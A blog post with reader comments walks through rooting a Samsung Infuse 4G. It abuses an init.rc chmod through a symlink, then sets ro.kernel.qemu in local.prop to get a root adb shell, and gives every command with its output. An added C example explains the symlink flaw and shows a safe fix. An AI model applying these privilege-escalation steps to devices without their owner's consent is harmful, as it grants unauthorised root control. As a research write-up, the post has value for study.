I received a Samsung Infuse 4G this year for Christmas, and one of the first questions I had was how to let this bad boy run free. A little searching showed that the device was already rootable with the RageAgainstTheCage exploit by the Android Exploid Crew, but of course using an already-written, pre-compiled exploit is too boring.
Note: before we even begin, the device should be placed into USB debugging mode so we can interact with it from a shell via ADB (the Android Debug Bridge).
After some snooping around, I noticed that the device was vulnerable to a flaw similar to the ones Dan Rosenberg found with the Droid 3 and Admire. In the init.rc script (which is run at startup as root), we see the following command:
# Permission for WMDRM sample.hds file
chmod 0777 /data/data/.drm/.wmdrm/sample.hds
The sample.hds file doesn’t actually exist, but that doesn’t matter. What matters is that the .wmdrm directory is also 0777, so we have full control over its contents, and chmod follows symlinks. Let’s create a symlink to /data where sample.hds is supposed to be and reboot:
$ ln -s /data /data/data/.drm/.wmdrm/sample.hds
$ ls -l /data/data/.drm/.wmdrm/sample.hds
lrwxrwxrwx shell    shell             2012-01-02 20:13 sample.hds -> /data
$ exit
sh-4.1$ ./adb reboot
sh-4.1$ ./adb shell
$ ls -l
drwxrwx--x system   system            2012-01-02 20:14 dbdata
dr-x------ root     root              2012-01-02 20:14 config
drwxrwx--- system   cache             2012-01-02 20:14 cache
drwxrwx--x radio    radio             2012-01-02 20:14 efs
lrwxrwxrwx root     root              2012-01-02 20:14 sdcard -> /mnt/sdcard
drwxr-xr-x root     root              2012-01-02 20:14 acct
drwxrwxr-x root     system            2012-01-02 20:14 mnt
lrwxrwxrwx root     root              2012-01-02 20:14 d -> /sys/kernel/debug
lrwxrwxrwx root     root              2012-01-02 20:14 etc -> /system/etc
drwxr-xr-x root     root              2012-01-02 20:14 system
drwxrwxrwx system   system            2012-01-02 20:14 data
drwxr-xr-x root     root              1969-12-31 19:00 sys
drwxr-xr-x root     root              2011-08-03 23:33 modules
dr-xr-xr-x root     root              1969-12-31 19:00 proc
drwxr-xr-x root     root              2012-01-02 20:14 dev
-rwxr-xr-x root     root        12127 2010-08-12 10:06 recovery.rc
-rwxr-xr-x root     root          945 2010-08-27 09:41 lpm.rc
-rw-r--r-- root     root        25100 2011-03-17 02:00 init.rc
drwxr-xr-x root     root              2011-08-03 23:33 res
drwxr-xr-x root     root              2011-08-03 23:33 lib
drwxr-xr-x root     root              2011-08-03 23:33 sbin
-rw-r--r-- root     root          118 2011-08-03 23:13 default.prop
-rw-r--r-- root     root         1677 2010-07-06 15:13 init.goldfish.rc
-rw-r--r-- root     root         2378 2010-12-14 23:01 fota.rc
-rwxr-xr-x root     root          379 2010-05-28 03:06 init.smdkc110.rc
-rwxr-xr-x root     root       133016 2011-08-03 23:19 init
$
Our symlink was followed, and now the /data directory is 0777! From here we’ll create a /data/local.prop file with a configuration setting to not drop privileges when spawning a shell:
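As an added example (not from the original post), here is the root cause and the fix in C: a plain chmod() follows a symlink planted in a directory the unprivileged user controls, exactly as init did above, while opening the path with O_NOFOLLOW and applying fchmod() to the opened inode refuses it. The program builds its own scratch tree under /tmp; the names protected and sample.hds are constructed.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Symlink-safe chmod for a privileged process: O_NOFOLLOW makes open() fail
 * with ELOOP when the final component is a symlink, so a link planted by an
 * unprivileged user cannot redirect the mode change to another inode. */
int chmod_nofollow(const char *path, mode_t mode)
{
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NOCTTY | O_CLOEXEC);
    if (fd < 0)
        return -1;
    int rc = fchmod(fd, mode), saved = errno;
    close(fd);
    errno = saved;
    return rc;
}

/* Constructed replay of the init.rc situation: a directory the unprivileged
 * user controls holds a symlink sample.hds pointing at a directory that must
 * stay 0700. Reports the target's mode after plain chmod() and after
 * chmod_nofollow(); returns 0 if the safe variant was refused with ELOOP. */
int demo(mode_t *after_plain, mode_t *after_safe)
{
    char base[] = "/tmp/hdsdemoXXXXXX", target[64], link[64];
    struct stat st;
    if (mkdtemp(base) == NULL)
        return -1;
    snprintf(target, sizeof target, "%s/protected", base);
    snprintf(link, sizeof link, "%s/sample.hds", base);
    if (mkdir(target, 0700) != 0 || symlink(target, link) != 0)
        return -1;

    chmod(link, 0777);                  /* follows the link: target is now 0777 */
    stat(target, &st);
    *after_plain = st.st_mode & 0777;

    chmod(target, 0700);                /* restore, then retry the safe way */
    int rc = chmod_nofollow(link, 0777), err = errno;
    stat(target, &st);
    *after_safe = st.st_mode & 0777;    /* unchanged: still 0700 */

    unlink(link); rmdir(target); rmdir(base);
    return (rc == -1 && err == ELOOP) ? 0 : -1;
}
```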
$ echo ro.kernel.qemu=1 > /data/local.prop
$ exit
sh-4.1$ ./adb reboot
sh-4.1$
After restarting, the phone refuses to boot and vibrates a bunch due to parsing the ro.kernel.qemu property. We told the device it was running in an emulator when it’s actually still running on hardware, leading to confusion. However, we are still able to spawn a shell with adb:
sh-4.1$ ./adb shell
# id
uid=0(root) gid=2000(shell) groups=1007(log)
#
Success! For persistence, we’ll follow the typical song and dance and copy over some binaries and install the Superuser app:
# mount -o rw,remount /dev/stl9 /system
# exit
sh-4.1$ ./adb push su /system/bin
233 KB/s (26264 bytes in 0.109s)
sh-4.1$ ./adb push busybox /system/bin
500 KB/s (1867568 bytes in 3.646s)
sh-4.1$ ./adb install Superuser.apk
449 KB/s (196521 bytes in 0.427s)
        pkg: /data/local/tmp/Superuser.apk
^C
sh-4.1$ ./adb shell
# chmod 4755 /system/bin/su /system/bin/busybox
#
Clean up our files and reboot the device:
# rm /data/local.prop
# rm /data/data/.drm/.wmdrm/sample.hds
# reboot
sh-4.1$
Running `su` in the adb shell, as well as apps for rooted phones, will now prompt the user (on the phone itself) to grant root privileges to the process. This selection can be remembered for future use.
A one-click root script for Linux is available here: https://github.com/mncoppola/Infuse-4G-root. If this exploit works for other phones, contact me and I’ll update the post.
Thanks to Dan Rosenberg for his tips and guidance throughout the process.
Do you have the unroot software for windows platform?
SuperOneClick runs on Windows and should have an unroot button
Do you have a root for a Samsung Galaxy Precedent? I’ve tried a few with no success.
Sorry, I don’t have a root exploit for that device. The only device I’ve been able to test so far is the Infuse 4G.
I have tried your method a couple of times now to no avail; this is all I get:
Waiting until device is ready
* daemon not running. starting it now on port 5037 *
* daemon started successfully *
Creating symbolic link
link failed No such file or directory
Rebooting, waiting until device is ready
cannot create /data/local.prop: permission denied
Rebooting, waiting until device is ready
mount: Operation not permitted
Installing persistence apps
failed to copy ‘dependencies/su’ to ‘/system/bin/su’: Read-only file system
failed to copy ‘dependencies/busybox’ to ‘/system/bin/busybox’: Read-only file system
Unable to chmod /system/bin/su: No such file or directory
failed to copy ‘dependencies/Superuser.apk’ to ‘/system/app/Superuser.apk’: Read-only file system
Cleaning up files
rm failed for /data/local.prop, No such file or directory
rm failed for /data/data/.drm/.wmdrm/sample.hds, No such file or directory
Finished – Enjoy!
My phone does reboot once or twice during the process.
Would you mind posting the model number and build number of your device?
Settings > About phone
You do have an Infuse 4G but it unfortunately seems like Rogers made custom modifications to the device that removed (or at least changed) the bug. I wrote the exploit to work against my own device, an SGH-I997 FROYO-UCKH1.
You might want to try these methods instead:
I figured it was Rogers’ fault lol. I’ve had no luck rooting this damn phone; I’ve tried several different methods, and with no access to a Windows machine I have limited options. I’ll try the above threads and let you know, thanks for your help.